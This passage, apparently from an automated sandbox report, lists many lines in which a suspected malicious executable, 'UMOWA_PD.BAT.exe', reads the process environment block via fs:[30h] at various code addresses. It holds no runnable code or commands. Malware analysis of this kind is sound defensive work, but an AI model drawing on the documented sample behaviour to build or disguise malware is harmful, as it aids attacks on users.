        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB42AF mov eax, dword ptr fs:[00000030h]2_2_33CB42AF
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C892AF mov eax, dword ptr fs:[00000030h]2_2_33C892AF
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D6B2BC mov eax, dword ptr fs:[00000030h]2_2_33D6B2BC
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D6B2BC mov eax, dword ptr fs:[00000030h]2_2_33D6B2BC
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D6B2BC mov eax, dword ptr fs:[00000030h]2_2_33D6B2BC
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D6B2BC mov eax, dword ptr fs:[00000030h]2_2_33D6B2BC
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8C2B0 mov ecx, dword ptr fs:[00000030h]2_2_33C8C2B0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D4F2AE mov eax, dword ptr fs:[00000030h]2_2_33D4F2AE
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CBF24A mov eax, dword ptr fs:[00000030h]2_2_33CBF24A
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D4F247 mov eax, dword ptr fs:[00000030h]2_2_33D4F247
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D4D270 mov eax, dword ptr fs:[00000030h]2_2_33D4D270
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8B273 mov eax, dword ptr fs:[00000030h]2_2_33C8B273
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8B273 mov eax, dword ptr fs:[00000030h]2_2_33C8B273
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8B273 mov eax, dword ptr fs:[00000030h]2_2_33C8B273
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D1B214 mov eax, dword ptr fs:[00000030h]2_2_33D1B214
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D1B214 mov eax, dword ptr fs:[00000030h]2_2_33D1B214
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8A200 mov eax, dword ptr fs:[00000030h]2_2_33C8A200
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8821B mov eax, dword ptr fs:[00000030h]2_2_33C8821B
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CCA22B mov eax, dword ptr fs:[00000030h]2_2_33CCA22B
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CCA22B mov eax, dword ptr fs:[00000030h]2_2_33CCA22B
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CCA22B mov eax, dword ptr fs:[00000030h]2_2_33CCA22B
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D10227 mov eax, dword ptr fs:[00000030h]2_2_33D10227
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D10227 mov eax, dword ptr fs:[00000030h]2_2_33D10227
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D10227 mov eax, dword ptr fs:[00000030h]2_2_33D10227
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB0230 mov ecx, dword ptr fs:[00000030h]2_2_33CB0230
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA01C0 mov eax, dword ptr fs:[00000030h]2_2_33CA01C0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA01C0 mov eax, dword ptr fs:[00000030h]2_2_33CA01C0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA51C0 mov eax, dword ptr fs:[00000030h]2_2_33CA51C0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA51C0 mov eax, dword ptr fs:[00000030h]2_2_33CA51C0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA51C0 mov eax, dword ptr fs:[00000030h]2_2_33CA51C0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA51C0 mov eax, dword ptr fs:[00000030h]2_2_33CA51C0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C881EB mov eax, dword ptr fs:[00000030h]2_2_33C881EB
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C9A1E3 mov eax, dword ptr fs:[00000030h]2_2_33C9A1E3
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C9A1E3 mov eax, dword ptr fs:[00000030h]2_2_33C9A1E3
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C9A1E3 mov eax, dword ptr fs:[00000030h]2_2_33C9A1E3
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C9A1E3 mov eax, dword ptr fs:[00000030h]2_2_33C9A1E3
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C9A1E3 mov eax, dword ptr fs:[00000030h]2_2_33C9A1E3
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CBB1E0 mov eax, dword ptr fs:[00000030h]2_2_33CBB1E0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CBB1E0 mov eax, dword ptr fs:[00000030h]2_2_33CBB1E0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CBB1E0 mov eax, dword ptr fs:[00000030h]2_2_33CBB1E0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CBB1E0 mov eax, dword ptr fs:[00000030h]2_2_33CBB1E0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CBB1E0 mov eax, dword ptr fs:[00000030h]2_2_33CBB1E0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CBB1E0 mov eax, dword ptr fs:[00000030h]2_2_33CBB1E0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CBB1E0 mov eax, dword ptr fs:[00000030h]2_2_33CBB1E0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C991E5 mov eax, dword ptr fs:[00000030h]2_2_33C991E5
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C991E5 mov eax, dword ptr fs:[00000030h]2_2_33C991E5
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C891F0 mov eax, dword ptr fs:[00000030h]2_2_33C891F0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C891F0 mov eax, dword ptr fs:[00000030h]2_2_33C891F0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA01F1 mov eax, dword ptr fs:[00000030h]2_2_33CA01F1
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA01F1 mov eax, dword ptr fs:[00000030h]2_2_33CA01F1
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA01F1 mov eax, dword ptr fs:[00000030h]2_2_33CA01F1
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D581EE mov eax, dword ptr fs:[00000030h]2_2_33D581EE
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D581EE mov eax, dword ptr fs:[00000030h]2_2_33D581EE
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CBF1F0 mov eax, dword ptr fs:[00000030h]2_2_33CBF1F0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CBF1F0 mov eax, dword ptr fs:[00000030h]2_2_33CBF1F0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C94180 mov eax, dword ptr fs:[00000030h]2_2_33C94180
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C94180 mov eax, dword ptr fs:[00000030h]2_2_33C94180
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C94180 mov eax, dword ptr fs:[00000030h]2_2_33C94180
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD1190 mov eax, dword ptr fs:[00000030h]2_2_33CD1190
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD1190 mov eax, dword ptr fs:[00000030h]2_2_33CD1190
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB9194 mov eax, dword ptr fs:[00000030h]2_2_33CB9194
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D651B6 mov eax, dword ptr fs:[00000030h]2_2_33D651B6
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CCE1A4 mov eax, dword ptr fs:[00000030h]2_2_33CCE1A4
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CCE1A4 mov eax, dword ptr fs:[00000030h]2_2_33CCE1A4
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CC41BB mov ecx, dword ptr fs:[00000030h]2_2_33CC41BB
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CC41BB mov eax, dword ptr fs:[00000030h]2_2_33CC41BB
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CC41BB mov eax, dword ptr fs:[00000030h]2_2_33CC41BB
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D63157 mov eax, dword ptr fs:[00000030h]2_2_33D63157
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D63157 mov eax, dword ptr fs:[00000030h]2_2_33D63157
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D63157 mov eax, dword ptr fs:[00000030h]2_2_33D63157
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8A147 mov eax, dword ptr fs:[00000030h]2_2_33C8A147
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8A147 mov eax, dword ptr fs:[00000030h]2_2_33C8A147
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8A147 mov eax, dword ptr fs:[00000030h]2_2_33C8A147
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CC415F mov eax, dword ptr fs:[00000030h]2_2_33CC415F
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D2314A mov eax, dword ptr fs:[00000030h]2_2_33D2314A
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D2314A mov eax, dword ptr fs:[00000030h]2_2_33D2314A
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D2314A mov eax, dword ptr fs:[00000030h]2_2_33D2314A
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D2314A mov eax, dword ptr fs:[00000030h]2_2_33D2314A
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C96179 mov eax, dword ptr fs:[00000030h]2_2_33C96179
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CE717A mov eax, dword ptr fs:[00000030h]2_2_33CE717A
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CE717A mov eax, dword ptr fs:[00000030h]2_2_33CE717A
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB510F mov eax, dword ptr fs:[00000030h]2_2_33CB510F
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB510F mov eax, dword ptr fs:[00000030h]2_2_33CB510F
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB510F mov eax, dword ptr fs:[00000030h]2_2_33CB510F
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB510F mov eax, dword ptr fs:[00000030h]2_2_33CB510F
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB510F mov eax, dword ptr fs:[00000030h]2_2_33CB510F
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB510F mov eax, dword ptr fs:[00000030h]2_2_33CB510F
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB510F mov eax, dword ptr fs:[00000030h]2_2_33CB510F
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB510F mov eax, dword ptr fs:[00000030h]2_2_33CB510F
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB510F mov eax, dword ptr fs:[00000030h]2_2_33CB510F
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB510F mov eax, dword ptr fs:[00000030h]2_2_33CB510F
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB510F mov eax, dword ptr fs:[00000030h]2_2_33CB510F
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB510F mov eax, dword ptr fs:[00000030h]2_2_33CB510F
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB510F mov eax, dword ptr fs:[00000030h]2_2_33CB510F
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C9510D mov eax, dword ptr fs:[00000030h]2_2_33C9510D
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CC0118 mov eax, dword ptr fs:[00000030h]2_2_33CC0118
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F113 mov eax, dword ptr fs:[00000030h]2_2_33C8F113
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F113 mov eax, dword ptr fs:[00000030h]2_2_33C8F113
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F113 mov eax, dword ptr fs:[00000030h]2_2_33C8F113
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F113 mov eax, dword ptr fs:[00000030h]2_2_33C8F113
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F113 mov eax, dword ptr fs:[00000030h]2_2_33C8F113
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F113 mov eax, dword ptr fs:[00000030h]2_2_33C8F113
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F113 mov eax, dword ptr fs:[00000030h]2_2_33C8F113
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F113 mov eax, dword ptr fs:[00000030h]2_2_33C8F113
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F113 mov eax, dword ptr fs:[00000030h]2_2_33C8F113
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F113 mov eax, dword ptr fs:[00000030h]2_2_33C8F113
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F113 mov eax, dword ptr fs:[00000030h]2_2_33C8F113
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F113 mov eax, dword ptr fs:[00000030h]2_2_33C8F113
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F113 mov eax, dword ptr fs:[00000030h]2_2_33C8F113
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F113 mov eax, dword ptr fs:[00000030h]2_2_33C8F113
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F113 mov eax, dword ptr fs:[00000030h]2_2_33C8F113
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F113 mov eax, dword ptr fs:[00000030h]2_2_33C8F113
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F113 mov eax, dword ptr fs:[00000030h]2_2_33C8F113
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F113 mov eax, dword ptr fs:[00000030h]2_2_33C8F113
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F113 mov eax, dword ptr fs:[00000030h]2_2_33C8F113
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F113 mov eax, dword ptr fs:[00000030h]2_2_33C8F113
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F113 mov eax, dword ptr fs:[00000030h]2_2_33C8F113
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CC7128 mov eax, dword ptr fs:[00000030h]2_2_33CC7128
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CC7128 mov eax, dword ptr fs:[00000030h]2_2_33CC7128
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D4F13E mov eax, dword ptr fs:[00000030h]2_2_33D4F13E
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CAB0D0 mov eax, dword ptr fs:[00000030h]2_2_33CAB0D0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8B0D6 mov eax, dword ptr fs:[00000030h]2_2_33C8B0D6
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8B0D6 mov eax, dword ptr fs:[00000030h]2_2_33C8B0D6
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8B0D6 mov eax, dword ptr fs:[00000030h]2_2_33C8B0D6
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8B0D6 mov eax, dword ptr fs:[00000030h]2_2_33C8B0D6
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C890F8 mov eax, dword ptr fs:[00000030h]2_2_33C890F8
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C890F8 mov eax, dword ptr fs:[00000030h]2_2_33C890F8
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C890F8 mov eax, dword ptr fs:[00000030h]2_2_33C890F8
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C890F8 mov eax, dword ptr fs:[00000030h]2_2_33C890F8
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CCD0F0 mov eax, dword ptr fs:[00000030h]2_2_33CCD0F0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CCD0F0 mov ecx, dword ptr fs:[00000030h]2_2_33CCD0F0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8C0F6 mov eax, dword ptr fs:[00000030h]2_2_33C8C0F6
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D64080 mov eax, dword ptr fs:[00000030h]2_2_33D64080
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D64080 mov eax, dword ptr fs:[00000030h]2_2_33D64080
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D64080 mov eax, dword ptr fs:[00000030h]2_2_33D64080
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D64080 mov eax, dword ptr fs:[00000030h]2_2_33D64080
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D64080 mov eax, dword ptr fs:[00000030h]2_2_33D64080
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D64080 mov eax, dword ptr fs:[00000030h]2_2_33D64080
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D64080 mov eax, dword ptr fs:[00000030h]2_2_33D64080
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8C090 mov eax, dword ptr fs:[00000030h]2_2_33C8C090
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8A093 mov ecx, dword ptr fs:[00000030h]2_2_33C8A093
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D650B7 mov eax, dword ptr fs:[00000030h]2_2_33D650B7
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD00A5 mov eax, dword ptr fs:[00000030h]2_2_33CD00A5
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D3F0A5 mov eax, dword ptr fs:[00000030h]2_2_33D3F0A5
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D3F0A5 mov eax, dword ptr fs:[00000030h]2_2_33D3F0A5
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D3F0A5 mov eax, dword ptr fs:[00000030h]2_2_33D3F0A5
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D3F0A5 mov eax, dword ptr fs:[00000030h]2_2_33D3F0A5
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D3F0A5 mov eax, dword ptr fs:[00000030h]2_2_33D3F0A5
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D3F0A5 mov eax, dword ptr fs:[00000030h]2_2_33D3F0A5
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D3F0A5 mov eax, dword ptr fs:[00000030h]2_2_33D3F0A5
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D4B0AF mov eax, dword ptr fs:[00000030h]2_2_33D4B0AF
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CC0044 mov eax, dword ptr fs:[00000030h]2_2_33CC0044
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D6505B mov eax, dword ptr fs:[00000030h]2_2_33D6505B
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C91051 mov eax, dword ptr fs:[00000030h]2_2_33C91051
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C91051 mov eax, dword ptr fs:[00000030h]2_2_33C91051
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C97072 mov eax, dword ptr fs:[00000030h]2_2_33C97072
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C96074 mov eax, dword ptr fs:[00000030h]2_2_33C96074
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C96074 mov eax, dword ptr fs:[00000030h]2_2_33C96074
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C98009 mov eax, dword ptr fs:[00000030h]2_2_33C98009
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB5004 mov eax, dword ptr fs:[00000030h]2_2_33CB5004
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB5004 mov ecx, dword ptr fs:[00000030h]2_2_33CB5004
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8D02D mov eax, dword ptr fs:[00000030h]2_2_33C8D02D
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D4F7CF mov eax, dword ptr fs:[00000030h]2_2_33D4F7CF
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CBE7E0 mov eax, dword ptr fs:[00000030h]2_2_33CBE7E0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C937E4 mov eax, dword ptr fs:[00000030h]2_2_33C937E4
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C937E4 mov eax, dword ptr fs:[00000030h]2_2_33C937E4
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C937E4 mov eax, dword ptr fs:[00000030h]2_2_33C937E4
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C937E4 mov eax, dword ptr fs:[00000030h]2_2_33C937E4
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C937E4 mov eax, dword ptr fs:[00000030h]2_2_33C937E4
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C937E4 mov eax, dword ptr fs:[00000030h]2_2_33C937E4
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C937E4 mov eax, dword ptr fs:[00000030h]2_2_33C937E4
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C977F9 mov eax, dword ptr fs:[00000030h]2_2_33C977F9
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C977F9 mov eax, dword ptr fs:[00000030h]2_2_33C977F9
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D0E79D mov eax, dword ptr fs:[00000030h]2_2_33D0E79D
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D0E79D mov eax, dword ptr fs:[00000030h]2_2_33D0E79D
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D0E79D mov eax, dword ptr fs:[00000030h]2_2_33D0E79D
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D0E79D mov eax, dword ptr fs:[00000030h]2_2_33D0E79D
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D0E79D mov eax, dword ptr fs:[00000030h]2_2_33D0E79D
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D0E79D mov eax, dword ptr fs:[00000030h]2_2_33D0E79D
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D0E79D mov eax, dword ptr fs:[00000030h]2_2_33D0E79D
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D0E79D mov eax, dword ptr fs:[00000030h]2_2_33D0E79D
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D0E79D mov eax, dword ptr fs:[00000030h]2_2_33D0E79D
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D6B781 mov eax, dword ptr fs:[00000030h]2_2_33D6B781
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D6B781 mov eax, dword ptr fs:[00000030h]2_2_33D6B781
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CC1796 mov eax, dword ptr fs:[00000030h]2_2_33CC1796
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CC1796 mov eax, dword ptr fs:[00000030h]2_2_33CC1796
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D617BC mov eax, dword ptr fs:[00000030h]2_2_33D617BC
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C907A7 mov eax, dword ptr fs:[00000030h]2_2_33C907A7
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D5D7A7 mov eax, dword ptr fs:[00000030h]2_2_33D5D7A7
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D5D7A7 mov eax, dword ptr fs:[00000030h]2_2_33D5D7A7
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D5D7A7 mov eax, dword ptr fs:[00000030h]2_2_33D5D7A7
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D3E750 mov eax, dword ptr fs:[00000030h]2_2_33D3E750
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CC174A mov eax, dword ptr fs:[00000030h]2_2_33CC174A
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CC3740 mov eax, dword ptr fs:[00000030h]2_2_33CC3740
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F75B mov eax, dword ptr fs:[00000030h]2_2_33C8F75B
